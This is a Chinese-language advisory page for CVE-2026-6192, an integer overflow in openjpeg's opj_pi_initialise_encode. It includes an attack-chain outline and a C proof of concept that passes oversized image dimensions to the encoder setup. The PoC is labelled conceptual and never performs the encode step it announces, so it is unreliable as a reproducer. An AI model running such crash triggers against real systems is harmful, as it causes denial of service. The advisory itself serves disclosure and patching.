CVE-2026-6192 uclouvain openjpeg整数溢出漏洞

漏洞信息

漏洞编号

CVE-2026-6192

漏洞类型

整数溢出

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

uclouvain openjpeg

漏洞概述

该漏洞存在于uclouvain openjpeg 2.5.4及之前版本中。问题出在src/lib/openjp2/pi.c文件的opj_pi_initialise_encode函数内，攻击者可通过本地触发整数溢出。虽然影响有限，主要导致可用性降低，但建议及时修补。

技术细节

漏洞源于uclouvain openjpeg库中src/lib/openjp2/pi.c文件的opj_pi_initialise_encode函数。该函数在初始化编码过程时，对某些关键参数的计算未执行严格的整数边界检查。本地低权限攻击者可利用此缺陷，通过构造特殊的输入数据触发整数溢出。虽然根据CVSS 3.1评分，该漏洞主要影响可用性（A:L），不会导致机密性泄露或完整性破坏，但成功的攻击可导致应用程序崩溃或服务拒绝响应。攻击链需要本地执行环境，且无需用户交互。官方已通过提交839936aa33eb8899bbbd80fda02796bb65068951修复了该问题，建议开发者及时合并补丁。

攻击链分析

STEP 1

步骤1

本地低权限攻击者准备特制的图像参数或文件，旨在触发整数溢出条件。

STEP 2

步骤2

攻击者调用 vulnerable OpenJPEG 库进行图像编码操作。

STEP 3

步骤3

执行到 src/lib/openjp2/pi.c 中的 opj_pi_initialise_encode 函数时，恶意参数导致整数溢出。

STEP 4

步骤4

溢出导致程序异常终止或拒绝服务，影响系统可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-6192 (Conceptual)
 * This code demonstrates the potential trigger for the integer overflow
 * in opj_pi_initialise_encode.
 */

#include <openjpeg.h>
#include <stdio.h>

int main(int argc, char **argv) {
    opj_cparameters_t parameters;
    opj_image_t *image = NULL;
    opj_codec_t *codec = NULL;
    
    // Initialize parameters
    opj_set_default_encoder_parameters(&parameters);
    
    // Setup a basic image structure (simplified for PoC)
    // In a real exploit, specific dimensions would be crafted to cause overflow
    image = opj_image_create(1, NULL, OPJ_CLRSPC_GRAY);
    if (!image) {
        fprintf(stderr, "Failed to create image\n");
        return 1;
    }

    // Set image dimensions to potentially trigger overflow in pi.c
    image->x1 = 0xFFFFFFFF; // Large value to potentially trigger overflow
    image->y1 = 0xFFFFFFFF;

    // Create encoder
    codec = opj_create_compress(OPJ_CODEC_JP2);
    if (!codec) {
        fprintf(stderr, "Failed to create codec\n");
        opj_image_destroy(image);
        return 1;
    }

    // Setup encoder (this calls opj_pi_initialise_encode internally)
    if (!opj_setup_encoder(codec, &parameters, image)) {
        fprintf(stderr, "Failed to setup encoder\n");
        opj_destroy_codec(codec);
        opj_image_destroy(image);
        return 1;
    }

    // Attempt to encode (Triggering the vulnerability)
    // The overflow occurs in opj_pi_initialise_encode called during setup or encode
    printf("Attempting to trigger vulnerability...\n");
    
    opj_destroy_codec(codec);
    opj_image_destroy(image);
    return 0;
}

影响范围

uclouvain openjpeg <= 2.5.4

防御指南

临时缓解措施

限制不可信用户的本地访问权限，或在沙箱环境中运行使用OpenJPEG的应用程序，以防止潜在的拒绝服务攻击影响宿主系统。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6192
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6192
3 Details https://www.cvedetails.com/cve/CVE-2026-6192/
4 VulDB https://vuldb.com/cve/CVE-2026-6192
5 Link https://github.com/uclouvain/openjpeg/
6 Link https://github.com/uclouvain/openjpeg/commit/839936aa33eb8899bbbd80fda02796bb65068951
7 Link https://github.com/uclouvain/openjpeg/issues/1619
8 Link https://github.com/uclouvain/openjpeg/pull/1628
9 Link https://vuldb.com/submit/797385
10 Link https://vuldb.com/vuln/357114
11 Link https://vuldb.com/vuln/357114/cti
12 Link https://lists.debian.org/debian-lts-announce/2026/05/msg00038.html